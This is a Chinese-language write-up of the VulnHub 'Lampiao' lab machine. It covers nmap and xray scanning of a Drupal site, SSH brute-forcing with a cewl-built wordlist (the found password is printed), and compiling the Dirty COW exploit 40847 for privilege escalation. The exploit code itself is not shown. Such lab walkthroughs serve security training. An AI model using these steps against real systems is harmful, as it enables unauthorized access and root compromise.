vulnhub渗透日记04：Lampiao

前言

⏰时间：2023.7.16
🗺️靶机地址： https://download.vulnhub.com/lampiao/Lampiao.zip
⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
🙏本人水平有限，如有错误望指正，感谢您的查阅！
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

arp-scan
netdiscover -i eth0 -r 192.168.58.1/24
nmap -sn 192.168.58.1/24 都是可以发现主机的
masscan扫描开放哪些端口

nmap针对开放的端口进一步探测

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p T:22,80,1898 -v 192.168.58.149 
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp   open  http?
| fingerprint-strings: 
|   NULL: 
|     _____ _ _ 
|     |_|/ ___ ___ __ _ ___ _ _ 
|     \x20| __/ (_| __ \x20|_| |_ 
|     ___/ __| |___/ ___|__,_|___/__, ( ) 
|     |___/ 
|     ______ _ _ _ 
|     ___(_) | | | |
|     \x20/ _` | / _ / _` | | | |/ _` | |
|_    __,_|__,_|_| |_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94%I=7%D=7/16%Time=64B35F21%P=x86_64-pc-linux-gnu%r(NULL
SF:,1179,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\|_\x20\x20\x20_\|\x20\|\x20\(\x
SF:20\)\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\n\x20\x20\|\x20\|\x20\|\x20\|_\|/\x20___\x20\x20\x20\x20___\x20\x20
SF:__\x20_\x20___\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\x20\x20\|\x20\|\x20\|\x20__\|\x20/\x20__\|\x20\x20/\x20_\x20\\/\x20_`\
SF:x20/\x20__\|\x20\|\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20_\
SF:|\x20\|_\|\x20\|_\x20\x20\\__\x20\\\x20\|\x20\x20__/\x20\(_\|\x20\\__\x
SF:20\\\x20\|_\|\x20\|_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\\___/\x20\\__\|
SF:\x20\|___/\x20\x20\\___\|\\__,_\|___/\\__,\x20\(\x20\)\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20__/\x20\|/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|___/\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\n______\x20_\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\n\|\x20\x20___\(_\)\x20\x20\x
SF:20\x20\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\|\n\
SF:|\x20\|_\x20\x20\x20_\x20\x20\x20\x20__\|\x20\|_\x20\x20\x20_\x20_\x20_
SF:_\x20___\x20\x20\x20__\x20_\x20\x20\x20\x20___\x20\x20__\x20_\x20_\x20\
SF:x20\x20_\x20\x20__\x20_\|\x20\|\n\|\x20\x20_\|\x20\|\x20\|\x20\x20/\x20
SF:_`\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20\\\x20/\x20_`\x20\|\x20\x
SF:20/\x20_\x20\\/\x20_`\x20\|\x20\|\x20\|\x20\|/\x20_`\x20\|\x20\|\n\|\x2
SF:0\|\x20\x20\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|_\|\x20\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|\x20\x20__/\x20\(_\|\x20\|\x20\|
SF:_\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|\\__
SF:,_\|_\|\x20\|_\|");
MAC Address: 00:0C:29:21:69:85 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.011 days (since Sun Jul 16 10:53:18 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.58.149

NSE: Script Post-scanning.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.18 seconds
           Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)

80端口没啥东西
进入1898
点击图片url有id值
尝试修改
访问audio.m4a是一段音频，说了句 user tiago
qrc.png里面是个二维码，扫过没啥用
第三页，有个mp3，咋的还得听首歌呗！
听了，挺欢快，但是没听出个啥
扫了下目录

也可以用xray被动扫描，可能会找到cve

xray.exe webscan --listen 127.0.0.1:7777 --html-output lam.html

____  ___.________.    ____.   _____.___.
\   \/  /\_   __   \  /  _  \  \__  |   |
 \     /  |    _  _/ /  /_\  \  /   |   |
 /     \  |    |   \/    |    \ \____   |
\___/\  \ |____|   /\____|_   / / _____/
      \_/       \_/        \_/  \/

[INFO] 2023-07-16 12:02:35 [collector:mitm.go:215] loading cert from ./ca.crt and ./ca.key
[INFO] 2023-07-16 12:02:35 [collector:mitm.go:271] starting mitm server at 127.0.0.1:7777
[INFO] 2023-07-16 12:02:39 [default:dispatcher.go:444] processing GET http://192.168.58.149:1898/?q=node/1
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/README.txt"
VulnType         "debug/readme"
Payload          "/README.txt"

[INFO] 2023-07-16 12:02:40 script poc-yaml-pbootcms-rce-cve-2022-32417 run payload linux
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/LICENSE.txt"
VulnType         "debug/readme"
Payload          "/LICENSE.txt"

[WARN] 2023-07-16 12:02:40 [sqldet:detector.go:239] different response status code 404/200
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/CHANGELOG.txt"
VulnType         "debug/readme"
Payload          "/CHANGELOG.txt"

[INFO] 2023-07-16 12:02:40 script poc-yaml-pbootcms-rce-cve-2022-32417 run payload windows
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/INSTALL.txt"
VulnType         "debug/readme"
Payload          "/INSTALL.txt"

[INFO] 2023-07-16 12:02:40 script poc-yaml-gurock-testrail-cve-2021-40875-info-leak run payload req01
[*] scanned: 0, pending: 1, requestSent: 510, latency: 100.79ms, failedRatio: 0.00%
[INFO] 2023-07-16 12:02:41 script poc-yaml-gurock-testrail-cve-2021-40875-info-leak run payload req02
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/MAINTAINERS.txt"
VulnType         "debug/readme"
Payload          "/MAINTAINERS.txt"

[INFO] 2023-07-16 12:02:41 script poc-yaml-wanhu-ezoffice-documentedit-sqli run payload oracle
[INFO] 2023-07-16 12:02:41 script poc-yaml-wanhu-ezoffice-documentedit-sqli run payload mysql
[INFO] 2023-07-16 12:02:41 script poc-yaml-wanhu-ezoffice-documentedit-sqli run payload mssql
[Vuln: dirscan]
Target           "http://192.168.58.149:1898/web.config"
VulnType         "config/web"
Payload          "/web.config"

[Vuln: dirscan]
Target           "http://192.168.58.149:1898/UPGRADE.txt"
VulnType         "debug/readme"
Payload          "/UPGRADE.txt"

[INFO] 2023-07-16 12:02:41 script poc-yaml-circarlife-scada-cve-2018-12634-info-leak run payload req01
[INFO] 2023-07-16 12:02:41 script poc-yaml-circarlife-scada-cve-2018-12634-info-leak run payload req02
[INFO] 2023-07-16 12:02:41 script poc-yaml-php-proxy-cve-2018-19458-fileread run payload linux
[INFO] 2023-07-16 12:02:41 script poc-yaml-php-proxy-cve-2018-19458-fileread run payload win
[INFO] 2023-07-16 12:02:41 script poc-yaml-adobe-experience-manager-cve-2019-8086-xxe run payload linux
[INFO] 2023-07-16 12:02:42 script poc-yaml-adobe-experience-manager-cve-2019-8086-xxe run payload win
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path01
[INFO] 2023-07-16 12:02:42 script poc-yaml-glpi-telemetry-cve-2021-39211-info-leak run payload req01
[INFO] 2023-07-16 12:02:42 script poc-yaml-glpi-telemetry-cve-2021-39211-info-leak run payload req02
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path02
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path03
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path04
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path05
[INFO] 2023-07-16 12:02:42 script poc-yaml-alibaba-nacos-v1-auth-bypass run payload hasPrefix
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path06
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path07
[INFO] 2023-07-16 12:02:42 script poc-yaml-alibaba-nacos-v1-auth-bypass run payload nonePrefix
[INFO] 2023-07-16 12:02:42 script poc-yaml-bitbucket-unauth run payload path08
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req01
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req02
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req03
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req04
[INFO] 2023-07-16 12:02:42 script poc-yaml-mantisbt-cve-2017-7615-unauth run payload req05
[INFO] 2023-07-16 12:02:42 script poc-yaml-manageengine-servicedesk-cve-2017-11512-lfi run payload windows
[INFO] 2023-07-16 12:02:42 script poc-yaml-kevinlab-bems-backdoor-cve-2021-37292 run payload p1
[INFO] 2023-07-16 12:02:43 script poc-yaml-kevinlab-bems-backdoor-cve-2021-37292 run payload p2
[INFO] 2023-07-16 12:02:43 script poc-yaml-manageengine-servicedesk-cve-2017-11512-lfi run payload linux
[INFO] 2023-07-16 12:02:43 script poc-yaml-laravel-filemanager-cve-2022-40734-path-traversal run payload req01
[INFO] 2023-07-16 12:02:43 script poc-yaml-laravel-filemanager-cve-2022-40734-path-traversal run payload req02
[INFO] 2023-07-16 12:02:43 [default:dispatcher.go:444] processing GET http://192.168.58.149:1898/
[*] All pending requests have been scanned
[*] scanned: 2, pending: 0, requestSent: 1608, latency: 38.83ms, failedRatio: 0.00%

目前就是拿到个用户名tiago，试试爆破22端口

ssh爆破

这么多页面可以用cewl爬取信息制作成密码字典

login: tiago password: Virgulino
ssh连接

提权

直接用脏牛提权
搜索40847，使用方法也告诉了
将文件传到目标

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
-Wall      #一般使用该选项，允许发出GCC能够提供的所有有用的警告
-pedantic  #允许发出ANSI/ISO C标准所列出的所有警告
-O2        #编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
-std=c++11 #就是用按C++2011标准来编译的
-pthread   #在Linux中要用到多线程时，需要链接pthread库